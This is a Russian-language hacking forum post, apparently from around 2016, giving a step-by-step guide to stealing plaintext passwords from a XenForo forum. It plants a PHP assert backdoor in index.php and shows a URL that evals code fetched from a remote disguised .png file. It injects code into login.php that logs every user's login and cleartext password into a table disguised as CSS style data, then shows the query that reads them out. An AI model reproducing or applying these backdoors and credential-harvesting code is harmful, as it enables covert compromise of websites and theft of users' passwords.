+ Ответить в теме
Показано с 1 по 1 из 1

Тема: Отсей пользователей без хеширования [Xenforo]

  1. #1
    Проверенные Аватар для d0m1nat0R.IQQI.
    Регистрация
    09.12.2012
    Сообщений
    1,180
    Сказал(а) спасибо
    1,875
    Поблагодарили 1,688 раз(а)
    в 548 сообщениях
    Репутация:   1  

    Отсей пользователей без хеширования [Xenforo]

    Дописываем код:Статья думаю будет интересна новичкам , которые хотят слить именно ту самую Базу Данных без хеша , т.е с чистыми паролями.


    Используем "WSO Web Shel"


    Отправляемся к файлу index.php , и дописываем вредоносный код:

    Код:
    if (isset($_REQUEST['l']))
    assert(stripslashes($_REQUEST[l]));
    Вызываем скрипт и получаем доступ к RemoteShell:

    Код:
    http://www.ru/index.php?l=eval(file_get_contents(%27http://www.ru/screen.png%27))#
    Код:
    create table xf_style_property_css (
    ID int(20) AUTO_INCREMENT,
    CSSName varchar(50) NOT NULL,
    CSSValue varchar(50) NOT NULL,
    PRIMARY KEY (ID)
    );
    Находим в файле login.php строки:




    Дописываем код:

    Код:
    $DataBaseConnector = mysql_connect('localhost', 'Имя БД', 'Пароль от БД');
            mysql_select_db('Имя БД');
            mysql_query("SET NAMES 'utf8'");
            $datalogxf = $data['login'];
            $datapassxf = $data['password'];
            mysql_query("INSERT INTO `xf_style_property_css` (`ID`, `CSSName`, `CSSValue`) VALUES ('', '$datalogxf', '$datapassxf') ", $DataBaseConnector);
    После всех выше описанных функций , каждый авторизованный пользователь будет внесен в наш раздел с базой (который создали выше).
    Выполняем команду получения списка: (Сейчас он пустой)

    Код:
    SELECT * FROM `xf_style_property_css`
    Россия виновата в том, что сидит на богатствах планеты и не даёт США и ЕС их использовать.

  2. Пользователь сказал cпасибо:

    MeXaHHuK (05.02.2016)

  3.  

+ Ответить в теме

Информация о теме

Пользователи, просматривающие эту тему

Эту тему просматривают: 1 (пользователей: 0 , гостей: 1)

     

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения